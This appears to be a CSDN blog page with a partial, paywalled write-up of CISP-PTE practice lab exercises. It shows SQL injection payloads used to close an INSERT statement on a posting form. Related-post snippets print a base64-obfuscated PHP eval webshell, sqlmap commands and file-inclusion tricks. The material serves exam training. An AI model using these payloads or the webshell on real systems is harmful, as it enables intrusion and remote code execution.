pte练习题(34011-34015)

最新推荐文章于 2025-05-05 23:20:23 发布
原创 最新推荐文章于 2025-05-05 23:20:23 发布 · 668 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #php

本文详细介绍了一个包含SQL注入、文件上传、文件包含等在内的渗透测试案例,通过具体步骤演示了如何发现并利用这些安全漏洞。

34011-34015

34011sql注入漏洞:

1.注册页找注入点,注册一个正常用户123,和一个符号用户’")#%–,发现可以注册,说明注册页无注入点。
2.发表页面
这里使用符号用户进行发表,提示失败说明此页面包含用户名,且含有注入点,换一个用户进行发表。
在这里插入图片描述
这里使用的是insert语句,应该是insert(‘’,‘’,‘’)格式,所以尝试‘,‘)测试闭合:
使用单引号时失败,说明是单引号
‘)-- 失败接着测试‘,‘’)-- 成功,说明内容后边还有一个插入的内容,根据插入未显示以及不同用户不能相互查看可推测是用户名。
测试:
‘,‘123’)–
在这里插入图片描述
成功显示,但是由于两个注入点都无法进行完整注入,接着对title进行测试:
title=tit’,‘concom’,‘123’)-- &content=con1
成功显示
在这里插入图片描述
因此可对concom字段处进行注入:
查库:
在这里插入图片描述

查表:
select group_concat(table_name)from info

最低0.47元/天 解锁文章
@preg_replace(“/\[(.*)\]/e“,‘\\1‘,base64_decode(‘w0bldmfskgjhc2u2nf9kzwnvzgu
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-26 890
文件包含漏洞有源码如下,其中包含代码@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('w0bldmfskgjhc2u2nf9kzwnvzgu 1、首先把这串字符串通过base64解码可得[@eval(base64_decode($_POST[z0]));]那么原来的语句就变成了@preg_replace("/\[(.*)\]/e",'\\1',[@eval(base64_decode($_POST[z0]);])); 2、@preg_replace("/\[(
CISP-PTE考前练习-文件包含
千寻的博客
10-23 5442
文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。
pte练习题(34041-34045)
haoaaao的博客
02-04 1845
一、34041(sql注入????????) 1、题目给出要读取文件的目录 2、进入题目,已经给出查询语句,加')%23将语句闭合: 3、order by测试列数,发现空格被屏蔽,使用/**/绕过: 4列可以正常执行,5列执行出错,说明数据库有4列; 4、使用联合查询(注意使用联合查询,前面的值要为-1): (1)union select 1,2,3,4,发现union被替换为/**/,双写绕过: (2)发现1234都是可以注入的位置,随便找一个...
pte练习题(34071-34075)
haoaaao的博客
02-08 1935
一、34071(sql注入) 1、get型,首先想办法闭合语句: (1)从代码中可以看出,--、#及其url转义均被屏蔽 ​​​​​​​ (2)前面加1',结尾加or '1, 来闭合语句: 2、语句成功闭合,使用sqlmap进行sql注入: (1)查询数据库: python sqlmap.py -u "http://ip:34071/start/index.php?uuid=1'or1'" --db...
pte练习题(34031-34035)
haoaaao的博客
02-04 1703
一、34031(二次sql注入) 和34021一毛一样 1、注册特殊字符用户,比如'"*--#,注册成功,说明注册登录页面没有sql注入漏洞;进入后重置密码,不成功,说明有sql注入漏洞,重置密码没有重新输入用户名的操作,说明重置密码的updata语句中,引入了注册的username,导致语句被注释; 2、注册admin'#+随便一个字符,比如admin'#1,设置密码,进入后重置密码,成功,说明单引号可以将updata语句闭合,#后面字符均无用,也就是成功将admin用户的密码重置; 3、使用ad
pte练习题(34021-34025)
haoaaao的博客
02-04 2256
一、34021(二阶sql注入) 1、测试: (1)用正常用户名密码注册,成功,无漏洞,修改密码,成功 (2)用特殊字符注册,成功,无漏洞,修改密码,不成功,存在sql漏洞。说明前期注册的用户名会影响后面密码修改部分的数据: 数据插入语句: insert xxx value (username,password) //无漏洞 重置密码: updata xxx value (新密码) where username=()/...
pte模拟考试_PTE猩际(PTE考试练习)V2.2.1 手机最新版
weixin_39854070的博客
12-18 1242
PTE猩际(PTE考试练习)PTE考试练习必备的软件。 本款耳机拥有最完整的机经,并提供声波校正,离线练习,考试模拟和其他功能,以帮助您准备考试,轻松过关。功能特征[PTE视频课程]PTEPTE不仅仅是一个很好的练习平台。学生还可以在应用程序中学习全套PTE入门课程,以快速掌握所有技能。[分享答案]邀请教师和PTE测试人员进行评论和互动,以建立您的PTE学习圈。[日常练习]参与APP中的“今日...
模拟cisp-pte 第三题 文件包含
小明师傅博客
06-14 5088
input的方式写入一句话 菜刀连他拿到key
CISP-PTE练习篇(基础题目三:文件包含)
wojiaoqwe的博客
01-30 4911
本文仅当作练习记录使用。
pte练习——34051(sql)、34061、34214(代码)、34223(文件包含)、34224(xss)、34234(代码)、34415(xss)
haoaaao的博客
02-10 3206
一、34051(sql注入) 1、输入用户名和特殊字符密码,发现个别字符被屏蔽,说明用户密码中存在sql注入漏洞。 2、想办法闭合语句,发现关键词大多数被屏蔽,尝试用or闭合,or被屏蔽,使用多写或大写可以绕过: 二、34061(sql注入) 1、题中给出查询语句,想办法闭合语句: 2、使用sql语句查询: (1)order by测试列数为7: (2)union select联...
CISP-PTE 文件包含
XiaoYeZhu_1314的博客
04-25 1118
2、查看页面源代码,发现data://替换成了空,其余的都在,data://被注释了。5、进入文件管理,找到html目录,找到key,拿到值。1、尝试使用data协议,发现php被过滤掉了。3、双写datdata://a://4、将地址放入蚁剑或菜刀中连接。
CISP-PTE八套真题详解(侵删)
热门推荐
00勇士王子的博客
12-02 2万+
PTE八套模拟题详解,侵删
cisp-pte考试复盘及常考题型总结
xnxqwzy的博客
11-09 633
说基础也不基础,pte的题都是偏实践的那一类,感觉也不算简单,不好好看看还真容易栽这上面,那就太可惜了。比如:DMZ区、php伪协议、谷歌命令、%00截断中对php版本的要求等等类似的。
Cisp-pte基础题通关姿势--保姆级教学(sql注入、文件上传、文件包含、命令执行、日志分析)
最新发布
ping204568238的博客
05-05 1390
发现关键信息:行 881: 172.16.12.12 - - [31/Oct/2017:15:33:50 +0800] "GET /adminlogin.php HTTP/1.1" 200 1888 "-" "-"。(1) php://input是个可以访问请求的原始数据的只读流,可以访问请求的原始数据的只读流,将post请求中的数据作为php代码执行。
PTE-靶场训练-1
qq_42041946的博客
06-26 1817
设置好后reboot重启一下即可,然后访问81-85端口,共5题。因为靶场出了问题,只能打开第一题,建议按照原网络环境去设置仅主机模式,原IP地址是172.16.12.100,虚拟机中的攻击机也可以配置同网段仅主机模式即可,问题不大。pet-2003设置net模式就好了,发现用桥接模式扫描端口失败通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。
渗透测试CISP-PTE:暴力破解
未知2066的博客
02-20 6909
暴力破解是一种针对于密码或身份认证的破解方法,即穷举尝试各种可能,以尝试破解密码或用户名或找到隐藏的网页,或者找到用于加密消息的密钥。暴力破解不仅可以被恶意者使用,还可以用于检查系统、网络或应用程序中使用的弱密码。
CISP-PTE考前实操练习题
2301_79546223的博客
09-13 1743
CISP-PTE考前学习练习题目,渗透测试功工程师
基础题目三:文件包含
king丶
07-31 2297
出来一个 Are you ok ? 访问view.html 查看源码 <?php @$a = $_POST['Hello']; if(isset($a)){ @preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=')); } ?> base64 解密出来等于 = [@eval(base64_decode($_POST[...
CISP-PTE模拟环境下载指南与介绍
认证考试通常包括多项选择题和实际操作题,测试申请者在渗透测试领域的理论知识和实践技能。 8. 模拟环境的持续更新和维护 为了保持模拟环境的有效性和现实性,必须对环境进行定期的更新和维护,包括更新操作系统...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值